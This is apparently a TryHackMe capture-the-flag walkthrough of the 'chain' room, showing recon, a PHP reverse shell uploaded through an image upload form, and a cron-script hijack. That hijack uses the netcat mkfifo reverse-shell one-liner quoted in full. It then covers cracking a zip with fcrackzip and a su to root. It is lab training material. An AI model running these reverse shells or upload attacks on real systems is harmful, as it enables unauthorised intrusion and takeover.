username: hashghost
Introduction
This room was created by peterchain in trychckme platform it’s difficulty level was easy.
Lets start with enumerations as it was proposed
nmap scan
Command
1
nmap -sC -sV 10.10.176.162 -oN nmap-scan
Result
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
┌──(gemstone㉿kali)-[~/C7F5/thm/chain]
└─$ cat nmap-scan
# Nmap 7.92 scan initiated Sat May 14 17:02:25 2022 as: nmap -sC -sV -oN nmap-scan 10.10.176.162
Nmap scan report for 10.10.176.162
Host is up (0.17s latency).
Not shown: 994 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
20/tcp closed ftp-data
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 f0:c0:cd:b4:9a:8d:c9:8d:3e:59:0a:a6:f6:90:98:f7 (RSA)
| 256 17:b2:38:4d:f0:d5:d3:4a:a9:15:96:88:aa:d8:25:2b (ECDSA)
|_ 256 38:99:59:33:67:ea:c6:e6:24:be:62:70:12:ec:3e:ac (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: home - Welcome
|_http-server-header: Apache/2.4.29 (Ubuntu)
443/tcp closed https
3306/tcp closed mysql
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat May 14 17:02:52 2022 -- 1 IP address (1 host up) scanned in 27.20 seconds
Then this is web, it is running on port 80 and it is open. It contains some other ports open but they can not help us for now.
Gobuster scan
Command
1
gobuster dir -u http://10.10.176.162/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-small-directories.txt -t 40 -f -x php -o gobuster
Results
1
2
3
4
5
6
7
8
9
10
┌──(gemstone㉿kali)-[~/C7F5/thm/chain]
└─$ cat gobuster
/uploads/ (Status: 200) [Size: 59]
/assets/ (Status: 200) [Size: 1116]
/gallery.php (Status: 200) [Size: 4354]
/admin/ (Status: 200) [Size: 3991]
/images/ (Status: 200) [Size: 1936]
/index.php (Status: 200) [Size: 16312]
/icons/ (Status: 403) [Size: 278]
/server-status/ (Status: 403) [Size: 278
Here we have some useful directories but we can continue to bruteforce recusively with additional option which will help us to bruteforce other directories.
1
gobuster dir -u http://10.10.176.162/admin -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-small-directories.txt -t 40 -f -x php -o gobuster-admin
Results
1
2
3
4
5
6
7
8
┌──(gemstone㉿kali)-[~/C7F5/thm/chain]
└─$ cat gobuster-admin
/assets/ (Status: 200) [Size: 2090]
/home.php (Status: 302) [Size: 8846] [--> logout.php]
/logout.php (Status: 302) [Size: 0] [--> index.php]
/index.php (Status: 200) [Size: 3991]
/header.php (Status: 302) [Size: 4] [--> logout.php]
/slider.php (Status: 200) [Size: 22426]
Here we get some usefull directories attached to the admin directory. If we try to visit this directory we will find some valuable details but the most intended directory will be /admin/slider.php
Visit the admin/slider.php
In this page we can upload file and instructions specifies that it is image upload, but what if we can upload any file example a php file with malicious codes which can give us reverse shell.
Then i decided to upload the pentestmonkey php reverse shell which will give us a reverse shell.
Before uploadding a reverse shell payload from pentestmonkey make sure you are listenning with netcat through the following
1
2
3
┌──(gemstone㉿kali)-[~/C7F5/thm/chain]
└─$ nc -nvlp 1234
listening on [any] 1234 ...
After uploading it it will prompt the following message
Then for us to get the shell we have to make sure that the php reverse shell payload is executing and this can be done by know/identify where excatly the script is uploaded. On the image above it seems the slider has been added to gallery and in the dir bruteforcing we got gallery.php so we will go to that page and refresh it.
And on our netcat we have a shell
We are in.
Stabilize shell.
Now we have shell but it is not stable, meaning if we press ctr+c the shell will disappear and here are the steps to stabilize it.
1
2
3
4
5
6
7
8
9
10
11
12
$ python -c 'import pty;pty.spawn("/bin/bash")'
batman@owaspQuiz:/$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/tmp
<l/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/tmp
batman@owaspQuiz:/$ export TERM=xterm-256color
alias ll='ls -lsaht --color=auto'export TERM=xterm-256color
batman@owaspQuiz:/$
batman@owaspQuiz:/$ ^Z
zsh: suspended nc -nvlp 1234
┌──(gemstone㉿kali)-[~/C7F5/thm/chain]
└─$ stty raw -echo;fg;reset
[1] + continued nc -nvlp 1234
batman@owaspQuiz:/$
Then we are good now and can continue with privilege escalation.
Check whoami with which commands we can run with sudo.
We can not view because the batman requires password and we don’t have.
Then we will check some other interesting files including flags.
After listing some folders we discovered that they are two users in our machine user batman and user munojr
On munojr home’s directory there is our first flag then we will try to read it.
We can not read the file then lets check the cron jobs.
User privilege escalation.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
batman@owaspQuiz:/home/munojr$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* * * * * munojr /opt/munoupdate.sh
#
batman@owaspQuiz:/home/munojr$
Interesting there is a script in crontab which runs in every minute and it has named as munoupdate.sh
Lets read the file permission and check if we can write it
1
2
batman@owaspQuiz:/home/munojr$ ls -l /opt/munoupdate.sh
-rwxr-xrwx 1 munojr munojr 845 May 13 15:05 /opt/munoupdate.sh
Bravo!! we can write on the script then lets read first before changing it.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
batman@owaspQuiz:/home/munojr$ cat /opt/munoupdate.sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 172.17.17.62 8000 >/tmp/f
#!/bin/bash
startupdate() {
echo
echo "-----------------------------------------"
echo ">>> Command Execting Was Successful. <<<"
echo "-----------------------------------------"
echo
}
start() {
echo
echo "***>>> Updating The Operating System <<<***"
echo
}
exitUpdate() {
echo
echo "-------------------------------------------------------"
echo ">>> Operating System Update Has Been Completed <<<"
echo "-------------------------------------------------------"
echo
exit 1
}
#calls the functions
start
startupdate
exitUpdate
This script has some update functions but there is reverse shell payload
1
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 172.17.17.62 8000 >/tmp/f
We can use the payload and listen for the munojr shell, in my case i changed into the following ip address
1
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.11.230 1122 >/tmp/f
and then listening to with netcat.
When you start netcat you have to wait for one minute so that you can have a reverse shell.
1
2
3
4
5
6
┌──(gemstone㉿kali)-[~/C7F5/thm/chain]
└─$ nc -nvlp 1122
listening on [any] 1122 ...
connect to [10.9.11.230] from (UNKNOWN) [10.10.8.200] 52262
/bin/sh: 0: can't access tty; job control turned off
$
We now have a shell then we will stabilize as usual and after it lets read the user.txt file first.
1
2
3
4
munojr@owaspQuiz:~$ ls
todo.txt user.txt
munojr@owaspQuiz:~$ cat user.txt
THM{REDACTED}
Now we are half of the journey lets continue to the escalation to root user.
Root privilege escalation.
On munojr home directory they were two files and we read only user.txt then lets read todo.txt file
1
2
3
4
munojr@owaspQuiz:~$ cat todo.txt
Hey; munojr I wahttps://addons.mozilla.org/en-US/firefox/addon/shodan_io/nt you to automate system updates, kindly make sure our script is secure!!
regards peterChain!!
Your current password is : [Redacted]
This was a message showing that there is a file that have a password for root user. Then after seeing this message i decided to check for the /var/backups file.
1
2
3
4
munojr@owaspQuiz:~$ cd /var/backups/
munojr@owaspQuiz:/var/backups$ ls
s3cr3t.zip
munojr@owaspQuiz:/var/backups$
Lets unzip it.
1
2
3
4
5
6
munojr@owaspQuiz:/var/backups$ unzip s3cr3t.zip
Archive: s3cr3t.zip
checkdir error: cannot create munojr
Permission denied
unable to process munojr/.
[s3cr3t.zip] munojr/rootpass.txt password:
It failed to unzip because it requires password and we do not have munojr’s password.
Lets crack it but we have to send it first to our machine(your computer).
I tried to send it with python3 server it failed then i decided to use base64 method with command.
1
base64 -w0 s3cr3t.zip
Then copy it to your machine and save it with .zip extension mine was s3cr3t.zip
Bruteforcing password
1
2
3
4
5
6
┌──(gemstone㉿kali)-[~/C7F5/thm/chain]
└─$ fcrackzip -u -v -D -p /usr/share/wordlists/rockyou.txt s3cret.zip
'munojr/' is not encrypted, skipping
found file 'munojr/rootpass.txt', (size cp/uc 47/ 35, flags 9, chk 833c)
checking pw 055470056
PASSWORD FOUND!!!!: pw == *******
unzip the s3cret.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
┌──(gemstone㉿kali)-[~/C7F5/thm/chain]
└─$ unzip s3cret.zip
Archive: s3cret.zip
creating: munojr/
[s3cret.zip] munojr/rootpass.txt password:
extracting: munojr/rootpass.txt
┌──(gemstone㉿kali)-[~/C7F5/thm/chain]
└─$ cd munojr
┌──(gemstone㉿kali)-[~/C7F5/thm/chain/munojr]
└─$ ls
rootpass.txt
┌──(gemstone㉿kali)-[~/C7F5/thm/chain/munojr]
└─$ cat rootpass.txt
root:***********
now we have root password then we can be root by just su root and password will be the one we get from rootpass.txt.
1
2
3
4
5
6
7
8
munojr@owaspQuiz:~$ su root
Password:
root@owaspQuiz:/home/munojr# cd /root
root@owaspQuiz:~# ls
root.txt
root@owaspQuiz:~# cat root.txt
THM{REDACTED}
root@owaspQuiz:~#
The End.
Thanks for reading, see you next time.